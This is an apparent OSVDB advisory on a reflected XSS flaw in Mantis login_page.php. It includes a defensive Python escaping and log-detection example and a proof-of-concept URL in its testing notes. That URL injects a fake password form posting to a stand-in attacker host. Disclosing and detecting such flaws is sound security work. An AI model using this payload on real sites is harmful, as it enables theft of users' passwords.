Mantis login_page.php return Variable XSS

2004-08-22T09:59:23
ID OSVDB:9086
Type osvdb
Reporter Joxean Koret (joxeankoret@yahoo.es)
Modified 2004-08-22T09:59:23

Description

Vulnerability Description

Mantis contains a flaw that allows a remote cross-site scripting attack. The flaw exists because login_page.php does not validate the "return" variable it receives on submission before reflecting it into the page. A remote attacker could craft a URL that, when opened by a victim, executes arbitrary script code in the victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 0.19.0a2 (Alpha) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
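The reflected "return" value, its hardened form, and a detection check over web-server logs, as an added Python example that is not Mantis code. It assumes, for illustration only, that login_page.php echoes "return" into a hidden form field, and the access-log lines are constructed; only the attribute-breakout prefix from the testing notes above is taken from the advisory.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the advisory); the third carries the
# attribute-breakout prefix quoted in the advisory's testing notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Aug/2004:09:59:23 +0000] "GET /login_page.php?return=view_all_bug_page.php HTTP/1.1" 200 1532',
    '10.0.0.6 - - [22/Aug/2004:10:01:02 +0000] "GET /view_all_bug_page.php HTTP/1.1" 200 9901',
    '10.0.0.7 - - [22/Aug/2004:10:02:44 +0000] "GET /login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E HTTP/1.1" 200 1611',
]

# Allow-list for a decoded return target: a site-relative page name plus optional query; no ':' (schemes), quotes or angle brackets.
SAFE_RETURN = re.compile(r"[A-Za-z0-9_./?=&-]+")

def is_safe_return(value: str) -> bool:
    """Decode, then accept only values that match the allow-list."""
    decoded = unquote(value)
    if not decoded or decoded.startswith("//") or "://" in decoded or ".." in decoded:
        return False
    return SAFE_RETURN.fullmatch(decoded) is not None

def render_return_field(value: str, escape: bool) -> str:
    """Hidden field carrying the return target (assumed page structure).
    escape=False is the vulnerable pattern: a value starting with '">' closes the
    attribute and tag, so the rest is parsed as markup. escape=True is the fix."""
    if escape:
        value = html.escape(value, quote=True)  # attribute-context encoding
    return f'<input type="hidden" name="return" value="{value}">'

def find_suspicious_requests(lines):
    """(client, decoded return value) for login_page.php requests whose return
    parameter fails the allow-list; parse_qs already URL-decodes the value."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith("login_page.php"):
            continue
        for ret in parse_qs(parts.query).get("return", []):
            if not is_safe_return(ret):
                hits.append((line.split()[0], ret))
    return hits

if __name__ == "__main__":
    for client, ret in find_suspicious_requests(SAMPLE_LOG):
        print(f"{client}: unsafe return value {ret!r}")
```

Encoding at output time is what closes the hole; the allow-list additionally keeps the redirect target on-site, which the advisory's upgrade-only remediation does not address.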

Manual Testing Notes

http://[victim]/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform action=%22http:// malicious.site.com/script.xxx%22%3EPlease type your password : %3Cinput type=%22password%22 name=%22your_password%22%3E%3Cbr%3E%3Cinput type=%22submit%22 value=%22Give me your password, please...%22%3E%3C/ form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E %3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E %3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr

References:

Vendor URL: http://www.mantisbt.org/
Security Tracker: 1011051
Secunia Advisory ID: 12338
Related OSVDB ID: 9089
Related OSVDB ID: 9090
Related OSVDB ID: 9091
Related OSVDB ID: 9087
Related OSVDB ID: 9088
Other Advisory URL: http://www.securiteam.com/unixfocus/5KP0N0KDPA.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0292.html
CVE-2004-1730